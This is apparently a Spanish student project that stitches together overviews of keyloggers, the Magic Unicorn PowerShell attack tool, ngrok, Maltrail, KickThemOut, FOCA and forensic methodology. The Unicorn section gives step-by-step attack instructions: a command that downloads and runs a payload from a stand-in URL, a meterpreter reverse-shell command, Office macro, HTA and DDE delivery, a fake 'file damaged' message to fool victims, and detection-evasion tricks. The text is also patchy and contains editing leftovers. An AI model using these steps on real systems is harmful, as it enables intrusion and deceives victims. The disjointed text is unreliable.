Un Keylogger es cualquier software con la
capacidad de interceptar y registrar las pulsaciones que se hacen en el
teclado de la máquina afectada sin el conocimiento del usuario. El
Keylogger puede tanto almacenar localmente los datos grabados, o
enviarlos a una PC remota, que está bajo control del atacante.
Tipos de Keylogger
Existen
Keyloggers basados en software, y basados en hardware. Los Keyloggers
más comúnmente utilizados son los basados en software. Con frecuencia
se instala como parte de un elemento de malware más grande, como un
Caballo de Troya, o un “rootkit“.
Un Keylogger de este tipo es más fácil de introducir en una máquina,
puesto que no requiere de acceso físico a esta. Generalmente tiene la
capacidad de hacerse pasar por una API ante el sistema operativo de la
máquina objetivo, cosa que le permite al Keylogger grabar cada pulsación
de una tecla, a medida que van ocurriendo. También existen Keyloggers a
nivel del kernel, Keyloggers del tipo “hombre en el navegador“, y otras variedades más complejas.
Los
Keyloggers basados en hardware son menos comunes, pues son más
difíciles de implantar en la máquina objetivo. Los Keyloggers basados en
hardware suelen necesitar que el atacante tenga acceso físico a la
máquina objetivo. Esto puede hacerse tanto durante el proceso de
fabricación, como después de la distribución de los equipos. Algunas
variedades de hardware pueden instalarse durante el proceso de
fabricación, incluyendo Keyloggers a nivel del BIOS. Un infiltrado
malintencionado podría instalar tal Keylogger a nivel de la fábrica.
Otros Keyloggers basados en hardware pueden ser implementados mediante
memorias USB, o como conectores falsos para el teclado, ubicados entre
el cable del teclado y la PC. Si bien son más difíciles de implementar,
pueden resultar más flexibles para el atacante, dado que son
independientes del Sistema Operativo.
UNICORNIO: DEGRADAR EL ATAQUE E INYECTAR SHELLCODE DIRECTAMENTE EN LA MEMORIA
Un unicornio es una herramienta simple para usar un ataque de degradación de PowerShell e inyectar shellcode directamente en la memoria. Basado en los ataques de PowerShell de Matthew Graeber y la técnica de bypass de PowerShell presentada por David Kennedy (TrustedSec) y Josh Kelly en Defcon 18. El uso es simple, simplemente ejecute Magic Unicorn (asegúrese de que Metasploit esté instalado si utiliza los métodos Metasploit y se encuentra en la ruta correcta) y el magic unicorn generará automáticamente un comando de PowerShell que necesita simplemente cortar y pegar el código de PowerShell en una ventana de línea de comandos o A través de un sistema de entrega de carga útil. Unicorn es compatible con su propio shellcode, cobalt strike y Metasploit.
INSTRUCCIONES DE ATAQUE POWERSHELL
Ahora todo se genera en dos archivos, powershell_attack.txt y unicorn.rc. El archivo de texto contiene todo el código necesario para inyectar el ataque de PowerShell en la memoria. Tenga en cuenta que necesitará un lugar que admita la inyección remota de comandos de algún tipo. Muchas veces esto puede ser a través de un documento Excel / Word o psexec_commands dentro de Metasploit, SQL, etc. Hay tantas implicaciones y escenarios en los que puedes usar este ataque. Simplemente pegue el comando powershell_attack.txt en cualquier ventana del símbolo del sistema o donde tenga la capacidad de llamar al ejecutable de PowerShell y le devolverá un Shell. Este ataque también es compatible con Windows / download_exec para un método de carga útil en lugar de solo para las cargas útiles de Meterpreter. Cuando utilice la descarga y exec, simplemente coloque Python unicorn.py Windows / download_exec url = https://www.thisisnotarealsite.com/payload.exe y el código de PowerShell descargará la carga útil y se ejecutará. Nota: Necesitará tener un oyente habilitado para capturar el ataque.
INSTRUCCIONES DE ATAQUE MACRO
Para el ataque de macro, deberá ir a Archivo, Propiedades, Cintas y seleccionar Desarrollador. Una vez que hagas eso, tendrás una pestaña de desarrollador. Cree una nueva macro, llámela Auto_Open y pegue el código generado en eso. Esto se ejecutará automáticamente. Tenga en cuenta que un mensaje le indicará al usuario que dice que el archivo está dañado y cerrará automáticamente el documento de Excel. ¡ESTO ES COMPORTAMIENTO NORMAL! Esto es engañar a la víctima para que piense que el documento de Excel está dañado. Debería obtener una cáscara mediante la inyección de PowerShell después de eso. Si está implementando esto contra Office365 / 2016 + versiones de Word, necesita modificar la primera línea de la salida de Sub Auto_Open () Para: Sub AutoOpen () El nombre de la macro en sí también debe ser "AutoOpen" en lugar del legado esquema de nombres "Auto_Open".
NOTA: Al copiar y pegar el Excel, si hay espacios adicionales que se agregan, debe eliminarlos después de cada una de las secciones de código de PowerShell bajo la variable "x" o ¡se producirá un error de sintaxis!
HTA INSTRUCCIONES DE ATAQUE
El ataque HTA generará automáticamente dos archivos, el primero el index.html que le indica al navegador que use Launcher.hta que contiene el código de inyección malicioso de PowerShell. Todos los archivos se exportan a la carpeta hta_access / y habrá tres archivos principales. El primero es index.html, el segundo Launcher.hta y el último, el archivo unicorn.rc. Puede ejecutar msfconsole -r unicorn.rc para iniciar el escucha para Metasploit. Un usuario debe hacer clic en permitir y aceptar al usar el ataque HTA para que la inyección de PowerShell funcione correctamente.
Instrucciones de DDE Office COM Attack
Este vector de ataque generará la fórmula DDEAUTO para colocar en Word o Excel. El objeto COM DDEInitilize y DDEExecute permiten crear fórmulas directamente dentro de Office, lo que hace que la capacidad de obtener la ejecución remota de código sin la necesidad de macros. Este ataque fue documentado y las instrucciones completas se pueden encontrar en:
https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ Para usar este ataque, ejecute los siguientes ejemplos: Python unicorn.py dde Python unicorn.py Windows / meterpreter / reverse_https 192.168.5.5 443 dde.
Una vez generado, se generará un powershell_attack.txt que contiene el código de Office y el archivo unicorn.rc, que es el componente de escucha que puede ser llamado por msfconsole -r unicorn.rc para manejar la escucha de la carga útil. Además, también se exportará un download.ps1 (explicado en la última sección).
Para aplicar la carga útil, como ejemplo:
Palabra abierta Insertar pestaña -> Piezas rápidas -> Campo Elija = (Fórmula) y haga clic en Aceptar.
Una vez que se inserta el campo, ahora debería ver "! Fin de fórmula inesperado" Haga clic derecho en el campo, elija "Alternar códigos de campo"
Pega el código del Unicornio.
Guarde el documento de Word. Una vez que se abre el documento de Office, debe recibir un Shell a través de la inyección de PowerShell. Tenga en cuenta que DDE está limitado en el tamaño de caracteres y debemos usar Invoke-Expression (IEX) como el método para descargar. El ataque DDE intentará descargar download.ps1, que es nuestro ataque de inyección PowerShell, ya que estamos limitados a restricciones de tamaño. Deberá mover el archivo download.ps1 a una ubicación a la que pueda acceder la máquina víctima. Esto significa que necesita alojar el download.ps1 en un directorio de Apache2 al que tiene acceso. Puede notar que algunos de los comandos usan " {QUOTE ", estas son formas de enmascarar comandos específicos. En este caso, estamos cambiando WindowsPowerShell, powershell.exe e IEX para evitar la detección. Además, revise la URL, ya que tiene algunos métodos excelentes para no llamar DDE en absoluto.
MÉTODO DE GENERACIÓN DE CÓDIGO DE SHELL PERSONALIZADO
Este método le permitirá insertar su propio código de Shell en el ataque Unicornio. El código de PowerShell aumentará el lado de la pila de powershell.exe (a través de VirtualAlloc) y lo inyectará en la memoria. Tenga en cuenta que para que esto funcione, el archivo txt al que apunta Unicorn debe estar formateado en el siguiente formato o no funcionará: 0x00,0x00,0x00 y así sucesivamente. Además, tenga en cuenta que hay restricciones de tamaño. El tamaño de longitud total del comando de PowerShell no puede exceder el tamaño de 8191. Este es el límite máximo de tamaño de argumento de línea de comando en Windows. Uso:
Python uniocrn.py shellcode_formatted_properly.txt shellcode A continuación, simplemente copie el comando de PowerShell a algo que tenga la capacidad de ejecutar comandos remotos.
2.1 POWERSHELL PowerShell es un Shell de línea de comandos y un lenguaje de scripting basado en tareas integrado en .NET. PowerShell ayuda a los administradores de sistemas y a los usuarios avanzados a automatizar rápidamente las tareas que administran sistemas operativos (Linux, macOS y Windows) y procesos. Los comandos de PowerShell permiten administrar los equipos desde la línea de comandos. Los proveedores de PowerShell permiten obtener acceso a almacenes de datos, como el Registro y el almacén de certificados, con la misma simplicidad con que se obtiene acceso al sistema de archivos. PowerShell incluye un analizador de expresiones muy completo y un lenguaje de scripting totalmente desarrollado.
NGROK
Ngrok es una de las plataformas de servicios de túneles más populares a través de las cuales pueden exponer fácilmente sus servidores locales que se encuentran detrás de NAT/ firewalls a la internet pública a través de túneles seguros.
Se conecta al servicio en la nube ngrok que acepta el tráfico en una dirección pública y transmite ese tráfico al proceso ngrok que se ejecuta en su máquina y luego a la dirección local que especifico.
¡CÓMO FUNCIONA?
Usted descarga y ejecuta un programa en su máquina y le proporciona el puerto de un servicio de red, generalmente un servidor web.
Se conecta al servicio en la nube ngrok que acepta el tráfico en una dirección pública y transmite ese tráfico al proceso ngrok que se ejecuta en su máquina y luego a la dirección local que especificó.
CARACTERÍSTICAS
Túneles seguros
Cree instantáneamente una URL HTTPS pública para un sitio web que se ejecuta localmente en su máquina de desarrollo.
Rápido
Los túneles ngrok se ejecutan con una versión optimizada de la tecnología que utiliza HTTP / 2 para que sus servicios tunelizados se carguen rápidamente.
1. Contraseña protegida
Configure las credenciales de autenticación http para proteger el acceso a su túnel y a las personas con las que lo comparte.
2. Soporte Websocket
¡Comparte tus aplicaciones web en tiempo real! ngrok túneles conexiones Websocket a través de túneles HTTP sin ningún cambio.
3. Repetir solicitudes de webhook
Desarrolle fácilmente integraciones de webhook simplemente "repitiendo" las solicitudes de webhook a su servidor de desarrollo.
4. Automatizar ngrok a través de API
Iniciar, detener y consultar dinámicamente el estado del túnel, todo con una simple API RESTful.
5. Solicitud de Inspección
Use la interfaz de inspección web de ngrok para comprender el tráfico de solicitud y respuesta HTTP a través de su túnel.
No más reenvío de puertos
No configure el reenvío de puertos en su enrutador ni pierda tiempo configurando soluciones DNS dinámicas. ngrok funciona en todas partes sin cambios, incluso cuando un dispositivo cambia las redes.
6. Túneles TCP
Exponga cualquier servicio en red a Internet, incluso aquellos que no usan HTTP como SSH.
7. Múltiples túneles simultáneos
Ejecute varios túneles simultáneamente con un solo cliente ngrok.
8. Sitios de host virtual de destino
Vuelva a escribir el Host encabezado de las solicitudes canalizadas para dirigirse a un sitio específico en su entorno de desarrollo WAMP / MAMP / Pow.
Acceso a cuentas compartidas para equipos.
Las cuentas pueden compartir el acceso a dominios y direcciones reservados, lo que permite a múltiples desarrolladores colaborar en un proyecto mientras aún tienen sus propias credenciales.
PASOS
VÍDEO TUTORIAL
CONCLUSIÓN
Al finalizar estas prácticas, se evidenció que a medida que la tecnología evoluciona a pasos agigantados en relación a los beneficios y facilidades que esta brinda a las personas, de igual manera o en mayor proporción, aumentan las amenazas en todos los aspectos y formas que sean necesarias para camuflarlas, inclusive si se trata de una simple descarga de una imagen, canción, video o cualquier tipo archivo multimedia sin generar algún tipo de sospecha.
También, se logró implementar los respectivos pasos para llevar a cabo este típico de ataque backdoor camuflado en estos tipos de archivos de uso común, a través de las herramientas MAGIC UNICORN Y NGROK en el entorno de Kali Linux, proporcionadas por los diferentes autores que hicieron posible el desarrollo de estas herramientas Open Source, para la creación de archivos ejecutables “.EXE” con códigos PowerShell embebidos, haciéndolos indetectables para la mayoría de antivirus tales como Avast Antivirus, NOD32, Kaspersky Antivirus, AVG Antivirus entre otros de gran prominencia. Por lo cual además de tener un antivirus como medida de seguridad también tener activa la opción de extensiones de archivo proporcionada por nuestros sistemas operativos.
En
primera instancia podemos referirnos a la informática forense como un área de
campo tecnológico que se encarga el análisis de sistemas informáticos en busca
de evidencia que colabore a llevar adelante una causa judicial o una
negociación extrajudicial, dentro de esta podemos también especificarla como la
aplicación de técnicas y herramientas de hardware y software para determinar datos
potenciales o relevantes la cual también puede servir para informar
adecuadamente al cliente acerca de las posibilidades reales de la evidencia
existente o supuesta de alguna violación a su información o a la integridad de
su empresa, equipo y la información que poseen los mismos.
Los
originales destinatarios de este servicio son los estudios jurídicos, aunque
cualquier entidad, empresa o persona puede contratarlo La necesidad de este
servicio se torna hace necesaria desde el momento en que la enorme mayoría de
la información generada está almacenada o guardada por medios electrónicos.
En la
recuperación de información nos encontramos con información que no es accesible
por medios convencionales, ya sea por problemas de funcionamiento del
dispositivo que lo posee, ya sea porque se borraron o rompieron las estructuras
administrativas de software del sistema de archivos.
se perdió
la información de una persona o entidad por un problema de fallo de la
tecnología de hardware y/o software o bien por un error humano, El usuario nos
indica su versión de los hechos y a menudo encontramos sobre la falla original
otras que el usuario o sus prestadores técnicos agregaron en un intento de
recuperación. Así es que debemos figurarnos a partir del análisis del medio qué
ocurrió desde el momento en que todo funcionaba bien y la información era
accesible.
En la
informática forense hablamos no nos dedicamos solamente a la recuperación de
información sino también al descubrimiento de información dado que no hubo
directamente una falla del dispositivo ni un error humano sino una actividad
subrepticia para borrar, adulterar u ocultar información. Es por lo tanto
esperable que el mismo hecho de esta adulteración pase desapercibido. La
informática forense apela a nuestra máxima aptitud dado que enfrentamos desde
casos en que el dispositivo fue borrado, golpeado y dañado físicamente hasta
ligeras alteraciones de información que pueden constituir un crimen.
Este
servicio es de utilidad a empresas que llevan adelante juicios laborales con
sus empleados, o con sus asociados por conflictos de intereses, a estudios
jurídicos que necesitan recabar información ya sea para presentarla frente a un
tribunal o bien para negociar con las partes un acuerdo extrajudicial de
resarcimiento, renuncia, etc. Es de utilidad a los organismos judiciales y
policiales que buscan evidencias de todo tipo de crímenes. Es un componente
indispensable en litigios civiles.
Por
consiguiente, hablaremos de los programas que utilizaremos para defendernos de
los ataques que se pueden presentar tomaremos conceptos de páginas de internet
las cuales nos explicaran la función de estos programas y cómo funcionan.
MALTRAIL
Es una
herramienta opensource, hecha en Python, destinada a analizar el tráfico de red
con el fin de detectar y registrar posibles amenazas.
La
diferencia es la categorización de las amenazas, las diversas fuentes de las
que tira (si la dirección IP tiene mala reputación en diferentes fuentes
abiertas), la inteligencia para identificar actividad sospechosa, la
identificación de malware que intenta llamar a casa, así como la presentación
de panel de detección que muestra, me ha resultado especialmente interesante, o
cuanto menos, complementario a la pila de paneles web de diversas herramientas
destinadas a monitorizar la seguridad.
Muestra
diversas estadísticas como número de amenazas, tendencias de eventos
clasificados como riesgo alto/medio/bajo, gráficas de tarta por severidad, por
top de fuentes atacantes, ETC.
El
tipo de despliegue es como el de cualquier IDS, es decir, sondas de detección
que envían eventos a un único servidor, por lo que es totalmente viable una arquitectura
distribuida, o incluso aprovechar, sondas existentes que estén analizando tráfico
con otras herramientas opensource, para integrar un proceso más. He podido
comprobar que no incrementa de forma excesiva los recursos necesarios de la
máquina por lo que en un tráfico “normal” es una opción interesante.
Cabe
resaltar que:
üDispone de una documentación bastante completa. Para
lo sencillo que es de configurar (un único fichero con pocas opciones), la
documentación existente es muy buena y más que suficiente sobre las virtudes de
la herramienta
üPosibilidad de escuchar en un interfaz o en todos los
de la máquina sensor.
üla facilidad de filtrado de eventos, así como la
interacción que permite con cada columna, dependiendo de qué se trate. Por
ejemplo búsqueda de la dirección IP atacante en duckduckgo para búsqueda de la
IP en diferentes fuentes de análisis de reputación como robtex,
whois.domaintools, mxtoolbox, etc,...
üPlug and play: sólo tiene un paquete como dependencia.
üOpen source
KICKTHEMOUT
Es una
herramienta de código abierto, desarrollada en Python por Nikolaos Kamarinakis
y David Schütz, que nos permite expulsar dispositivos conectados a nuestra red
y de esta manera poder negarle la posibilidad de consumir ancho de banda.
Esta
herramienta usa un método de envenenamiento ARP o ARP Spoofing que mata la
conectividad a Internet del o los dispositivos conectados a tu red de área
local, los resultados son asombrosos y permiten que podamos disfrutar de todo
el ancho de banda de una red de manera rápida y sencilla.
Está destinada
a ser utilizada por los administradores de red para controlar el uso de ancho
de banda de intrusos y sólo funciona en aquellas redes a las que tienes acceso,
que además no cuentan con configuraciones de seguridad que impidan ataques de
ARP Spoofing.
En
cuanto a su funcionamiento para expulsar a los intrusos de tu wifi con
kickthemout, basta con que ejecutemos la herramienta con sudo python
kickthemout.py, esperemos que escanee tu red en busca de los dispositivos
conectados y elijamos si queremos expulsar a todos los dispositivos conectados
(a excepción de tu ordenador), expulsemos a un sólo dispositivos o a varios
dispositivos que elijamos.
Los
dispositivos elegidos estarán sin acceso a Internet mientras el comando este en
ejecución, por lo que este mecanismo de expulsión es temporal pero muy
efectivo. Con esta herramienta podemos disfrutar al máximo de nuestro ancho de
banda cuando los intrusos o familiares están conectados a la red, convirtiéndola
en una herramienta que cualquier usuario debe tener instalada en su ordenador
para cuando sea necesaria.
VÍDEO TUTORIAL
CONCLUSIÓN
Estos
dos programas fueron utilizados con el fin de aplicar lo que tiene que ver con
la informática forense que es el propósito de este proyecto, buscar los medios
necesarios para poder defendernos de múltiples ataques que se pueda presentar
en el mundo tecnológico.
Se
conoció a fondo todo lo que tiene que ver con la informática forense y el
propósito que tiene en este campo de la tecnología lo cual será crucial para
nuestras carreras como ingeniero de sistemas, la idea es poder aplicar esto no
solo a este proyecto, sino a los diferentes campos laborales que vamos a
encontrarnos en nuestra vida de profesionales.
Se
estudiaron las herramientas y su funcionamiento esto con el fin de aplicarla en
la exposición de nuestro proyecto y poder brindar un respaldo a nuestra
información y a la integridad de nuestra información.
GLOSARIO
üOPENSOURCE: El código abierto es un modelo de desarrollo de
software basado en la colaboración abierta. Se enfoca más en los beneficios
prácticos (acceso al código fuente) que en cuestiones éticas o de libertad que
tanto se destacan en el software libre. Para muchos el término «libre» hace
referencia al hecho de adquirir un software de manera gratuita, pero más que
eso, la libertad se refiere al poder modificar la fuente del programa sin
restricciones de licencia, ya que muchas empresas de software encierran su
código, ocultándolo, y restringiéndose los derechos a sí misma.
üIDS: Hace referencia a un mecanismo que, sigilosamente,
escucha el tráfico en la red para detectar actividades anormales o sospechosas,
y de este modo, reducir el riesgo de intrusión.
üARP: En red de computadoras, el protocolo de resolución de
direcciones (ARP, del inglés Address Resolution Protocol) es un protocolo de
comunicaciones de la capa de enlace, responsable de encontrar la dirección de
hardware (Ethernet MAC) que corresponde a una determinada dirección IP.
üPYTHON: Se trata de un lenguaje de programación
multiparadigma, ya que soporta orientación a objetos, programación imperativa
y, en menor medida, programación funcional. Es un lenguaje interpretado, usa
tipado dinámico y es multiplataforma.
Son los grupos de datos que describen el contenido informativo de un objeto
al que se denomina recurso, describen contenidos, calidad, condiciones,
historia, disponibilidad y otras características de los datos.
•Ser datos altamente estructurados que
describen características de los datos, como el contenido, calidad, información
y otras circunstancias o atributos.
•Presentan diferenciaciones que
dependerán, en última instancia, de las reglas incluidas en las aplicaciones
para determinar la estructura interna de los esquemas de datos.
•Pueden clasificarse en función de
distintos criterios, como su contenido, variabilidad o función.
Los beneficios de la gestión de metadatos son numerosos. Esta
"información sobre información" engloba todos los atributos de los
datos que describe cada archivo y, de forma conjunta, proporciona una
información de interés con muy distintas utilidades a la hora de mejorar la
gestión de los datos. En el entorno organizacional los metadatos juegan un
importante papel como marco de referencia, en línea con una visión genérica que
Forrester Research resume definiéndolos como "la información que describe
o proporciona el contexto para los datos, contenidos, procesos de negocio,
servicios, reglas de negocio y políticas de apoyo a los sistemas de información
de una organización".
•Facilita búsquedas y análisis: Los metadatos ayudan a buscar y ubicar
datos. Una buena gestión de metadatos también facilita el análisis del curso de
los datos desde la fuente, facilitando la autodocumentación, así como funciones
de transformación, análisis y reporting.
•Facilita
la estandarización: Al eliminar errores e inconsistencias, la estandarización
de datos mejora la calidad de los mismos a lo largo de su ciclo de vida. Con la
gestión de los metadatos en un repositorio centralizado conseguiremos una
visión más completa del ciclo de vida del dato, desde que se crea hasta que se
consume, además de ventajas en el control de procesos.
•Ayuda
a la integración: En la integración híbrida los metadatos son claves.
Sirviéndonos de un repositorio centralizado de metadatos para el uso compartido
entre los usuarios de TI y de negocio facilitaremos la gobernanza, así como una
aplicación de las mejores prácticas por parte de aquellos. De gran utilidad en
estructuras híbridas para mejorar la gestión de datos de forma integrada.
•Gestión
del cambio: Sobre todo, en entornos complejos, pues la gestión de metadatos
proporciona la visibilidad y el control necesarios para hacerlo en un entorno
de integración de datos empresariales. A través de una automatización de los
análisis de impacto detectaremos los cambios en las aplicaciones y podremos
intervenir para subsanar conflictos.
•Más
seguridad: En caso de haber cambios, una adecuada gestión de metadatos
protegerá los datos críticos del negocio y, en general, facilitará el
cumplimiento de la normativa.
•Mejora
los informes: Gracias a esa facilidad de intervención datos serán de
calidad y, los procesos no presentarán incidencias y, lógicamente, el reporting
ganará en confiabilidad. En general, una correcta gestión de metadatos
permitirá entregar datos seguros y confiables.
•Desarrollos
más ágiles: Un acceso inteligente a los metadatos, por ejemplo en un
entorno híbrido integrado, aumenta la productividad de los desarrolladores y
reduce el plazo de suministro de la conectividad. Ello se traduce en una rebaja
del coste del cambio entre las diferentes plataformas.
•Mejor
gobernanza de datos: Los metadatos gestionados en un entorno estandarizado
mediante un repositorio centralizado son esenciales para implementar un exitoso
programa de gobierno de datos. Entre otras ventajas, la gestión de los
metadatos aumenta la visibilidad de las distintas ejecuciones de patrones y
gestión de diferentes fuentes de datos, propiciando una gobernanza
centralizada, así como las mejores prácticas.
El nombre inicial de FOCA era MetaExtractor para Microsoft Office y
OOMetaextractor para OpenOffice y fue creada por la empresa Informatica64 (hoy
llamada ElevenPaths) en 2007. El origen del nombre siempre fue pensado en
alusión al animal foca, el cual es un depredador de pingüinos, mascota de las
distribuciones basadas en GNU/Linux. FOCA fue presentada oficialmente en 2010
en la conferencia de seguridad Ekoparty,En octubre de 2017 se presentó la última versión llamada FOCA
OpenSource.
Es una herramienta gratuita de pentesting para los sistemas operativos
Windows, utilizada principalmente en la búsqueda de información contenida en
metadatos de ficheros y de esta forma obtener datos relevantes asociados a una
organización o página web. FOCA significa Fingerprinting Organizations with Collected
Archives por sus iniciales en idioma inglés.
FOCA permite la
extracción y el análisis de metadatos ubicados en un servidor o una página web.
Dicha información se obtiene a partir de ficheros tipo Microsoft Office, PDF y
SVG entre otros que son localizados utilizando motores de búsqueda como Google,
Bing y DuckDuckGo. El análisis por parte de FOCA de dichos metadatos genera un
informe con información relevante como configuración de la red, proxy, ficheros
de backup, etc. Esta herramienta está programada en .NET y utiliza bases de
datos SQL Express. Desde la versión 2.7 ofrece capacidad de enrutar y colocar
en cola multihilo para poder analizar un sitio web extenso sin colapsar la
capacidad de procesamiento del ordenador donde se ejecuta (esto es llamado cola
de tareas).
A partir de la
información obtenida de los metadatos de los diferentes ficheros, el módulo de
descubrimiento de servidores utiliza las siguientes técnicas para realizar un
fingerprint del dominio o servidor auditado:
·Web
Search: búsqueda de nombres de servidores y
dominios.14
·DNS
Search: consulta de los hostnames NX, MX y
SPF.
·Resolución
IP: consultas a DNS internos de la
organización.
·PTR
Scanning: localización de servidores en el mismo
segmento de red.
·Bing
IP: búsqueda de servidores partiendo de
otras direcciones IP descubiertas.
·Common
Names: realiza ataques de diccionario DNS.
También analiza la posible existencia
de servidores proxy tipo Squid por medio de revisión del puerto 3128.15, en
cuanto a la información obtenida de los ficheros descargados retribuye la
siguiente información.
·Sistema operativo con
el que fueron creados los documentos.
·Modelos de impresoras
usadas.
·Fechas de impresión,
modificación y creación.
·Versión del software
utilizado en su creación.
·Correos electrónicos
dentro de los documentos, si hubiera alguno.
·Rutas de ficheros y
nombres de autores y nombres de usuarios.
FOCA también permite la instalación y
programación de complementos, los complementos oficiales se pueden descargar
desde el FOCA Market.
Ahora en la
versión 3.0 los chicos de Informatica64 han dado un nuevo aire a la
herramienta, cambiando completamente su interface, añadiendo nuevas
funcionalidades, en fin, uno de estas son:
·Re-styling del
interfaz.
·Panel de tareas
multi-hilo.
·Búsqueda de puertos de
squid proxy.
·Búsqueda de registros
de servicio en DNS.
·Búsqueda de políticas
anti-spam del dominio [SPF, DKIM, Domainkey]
·Búsqueda de ficheros
ICA y RDP: Usuarios, software en ellos y adición rol de RemoteApp.
·Análisis de .DS_Store
·Análisis de Robots.txt
·Integración de Shodan
y Robtex en el algoritmo
·Análisis de Leaks
[Solo en versión PRO]
·Análisis de errores de
aplicación
·Ampliación de
tecnologías
VÍDEO TUTORIAL
CONCLUSION
Podemos
concluir que hoy en día se tiene muy en cuenta la seguridad informática tanto
en empresas como en particulares, por lo que cada vez se usan más herramientas
para explotar o hallar vulnerabilidades. Una de las herramientas o programas
más usados para hacer Pen-Testing (test de penetración) es FOCA. Este programa
se utilizará para recopilar información de la organización a la que se quiera
atacar o hacer un test de penetración. De igual manera si lo que se busca es
proteger la información de este tipo de ataques, se sugiere entrar a la página
oficial de elevan path y buscar la herramienta Metashield, la cual servirá para
eliminar estos metadatos de los documentos y así asegurarnos de que al montar
una información a cualquier servidor web, esta estará segura.
Es la ciencia que recoge, analiza y dictaminan datos informáticos de sistemas informáticos o dispositivo electrónicos de tal manera que lo hace como prueba ante un tribunal de justicia.
De igual manera es importante citar, que la informática forense tiene dos objetivos y dos finalidades que son:
Objetivos
Preventivos: el funcionamiento principal en este caso, es contener la informática forense como parte del sistema de seguridad para anticiparse a cualquier problema.
Correctivos: enfrentar un incidente y conocer su fuente para que con ello se pueda evitar hacia un futuro que se repita el mismo problema.
Problemática
Probatoria: se implementa para obtener pruebas que permitan el hallazgo de la fuente, autor y circunstancias que ocasionan un incidente de seguridad informática y con ello de ser necesario presentar dichas pruebas ante un tribunal de justicia con finalidades legales.
Auditoria: permite conocer la robustez del sistema informático y con base en ello tomar las medidas correctivas si visualiza algún hallazgo.
¿Qué tan necesaria es la informática forense?
Esta ciencia es de vital importancia hoy en día cualquier investigación en la cual se vea implicado un dispositivo electrónico llámese computador, teléfono móvil, dispositivo de almacenamiento, etc. Debido a que ayuda a plasmar evidencias técnicas en un ámbito jurídico, bajo la normatividad vigente de la región/país en la cual se lleve a cabo el juicio.
Evidencia digital
Se refiere a “cualquier información sujeta a manipulación humana u otra semejante, extraída de un medio informático” (Cano, 2015, P.3). en este orden de ideas se ´puede definir que la evidencia digital es cualquier dato que sirva como prueba para ser presentado para llevar a cabo un proceso legal.
Está a se puede dividir en tres partes:
1. Registros informáticos almacenados en el equipo, bien sea por medio de correo electrónicos. Archivos digitales, imágenes, etc.
2. Registros generados por los equipos tecnológicos como auditorias, registros de transacciones, registros de eventos, etc.
3. Registros generados y almacenados en equipos tecnológicos como consultas a bases de datos, hojas de cálculo con información financiera, etc.
Es por ello que la materia prima de un investigador es la evidencia digital, debido a que la tecnología es fundamental en este tipo de procesos.
Características
De acuerdo con Cano (2015), la evidencia digital posee unas características
Es volátil
Es anónima
Es duplicable
Es modificables
Es eliminable.
Es por esto que se resalta la importancia de tener un conocimiento detallado de la normatividad asociada con las pruebas y derecho procesal, así como los procedimientos, técnicas utilizadas en el tratamiento de la información extraída.
Metodologías o modelos de análisis informático forense
Una metodología o modelo de análisis informático forense es una serie de etapas que involucran procedimientos, técnicas, herramientas software, hardware y aspectos legales, las cuales tienen como misión principal servir de guía al investigador informático forense en su trabajo de peritazgo. En otras palabras, tiene como objetivo principal documentar, educar y normalizar el análisis informático forense.
No existe un modelo estándar para el análisis informático forense, pero si unos modelos muy importantes y reconocidos internacionalmente los cuales se mencionan a continuación.
Modelo DFRWS (Digital Forensic Research Workshop).
Aporta el concepto conocido como “clases de acción en la investigación digital”, donde las “clases de acción” son técnicas de que permiten clasificar por grupos las actividades de un proceso investigativo.
Actividades:
Identificación.
Preservación.
Colección.
Examen.
Análisis.
Informe.
Decisión.
Modelo de Casey (versión 2000)
Actividades que conlleva
Identificación de evidencias.
Conservación, adquisición y documentación de evidencias.
Clasificación, comparación y documentación de evidencias.
Reconstrucción de los hechos.
En estas dos últimas actividades, se puede producir un ciclo repetitivo, ya que se pueden presentar nuevas evidencias que requieran un nuevo procesamiento. Por este motivo estas dos últimas actividades son denominadas por Casey como Ciclo de procesamiento de las pruebas.
Modelo de Casey (versión año 2004)
Actividades:
Autorización y preparación de evidencias.
Identificación de las evidencias.
Documentación de las evidencias.
Adquisición de las evidencias.
Conservación de las evidencias.
Examen y análisis de las evidencias.
Reconstrucción de lo sucedido.
Informe final o conclusiones.
Modelo forense del departamento de justicia de los estados unidos
Fases:
Preparación y extracción.
Identificación.
Análisis.
Además, este modelo estableció las especificaciones básicas en la investigación forense, las cuales son:
Emplear métodos científicos.
Recolectar y preservar.
Validar.
Identificar.
Analizar e interpretar.
Registrar, documentación y presentar.
Procedimientos realizados en el presente informe de análisis forense informático
Algunos de los elementos que deben considerarse al momento de adelantar un procedimiento de informática forense son los siguientes:
1. Esterilidad de los medios informáticos de trabajo: cada uno de los elementos utilizados por los investigadores debe de estar certificado para garantizar que no se haya vulnerado su integridad,
debido que, si este elemento fue expuesto a vibraciones magnéticas u otro tipo de exposición, la evidencia recolectada en este medio quedaría contaminada y no sería confiable en ningún procedimiento forense.
2. Verificación de las copias en medios informáticos: al momento de extraer las copias de información de los medios tecnológicos, estas deben de ser exactas a la original y deben estar asistidas por un método y un procedimiento utilizando algoritmos y técnicas basadas en firmas digitales que comprueben su veracidad.
3. Documentación de los procedimientos, herramientas y resultados de los medios informáticos utilizados: su propósito es que las personas externas puedan validar la información obtenida de dicho análisis.
4. Mantenimiento de la cadena de custodia de las evidencias digitales: este punto es complementario del anterior teniendo en cuenta quien entrego la información, cuando, en qué estado, como, entre otras preguntas para poder rendir cuentas de la correcta administración de las pruebas a cargo del investigador.
5. Informe y presentación de los resultados de los análisis de los medios informáticos: la adecuada presentación de los resultados es fundamental para la interpretación de las pruebas extraídas, si este requisito no se cumple, el investigador puede poner en entredicho su idoneidad y experticia en el manejo de la información.
6. Auditoria de los procedimientos realizados en la investigación: autoevaluación de los procedimientos realizados para contar con la evidencia de una buena práctica en su investigación, aplicando el ciclo de la calidad PHVA – planear, hacer, verificar y actuar, y de esta manera incrementar la confiabilidad de las técnicas aplicadas en la práctica de esta disciplina.
Fases aplicadas en el desarrollo del análisis forense informático
Herramientas utilizadas en el presente informe
Tool Kit (FTK): Es una herramienta que nos permite realizar replicas y visualizar los datos que se encuentran en el ordenador, permitiendo una evaluación rápida de la evidencia electrónica, para garantizar un análisis posterior con la herramienta forense Access Data Forensic Toolkit. Por otra parte, FTK permite crear copias perfectas llamadas (Imágenes Forenses) que son datos Cambie la definición de la herramienta y características encontrados en el ordenador sin realizar ningún cambio en la evidencia original. De acuerdo a FTK todos los filtros son personalizables y permite buscar en miles de archivos rápidamente las pruebas necesarias, se dice que FTK es la herramienta más reconocida en forense por el análisis que realiza en los correos electrónicos, y sus principales funciones son:
Fácil de usar.
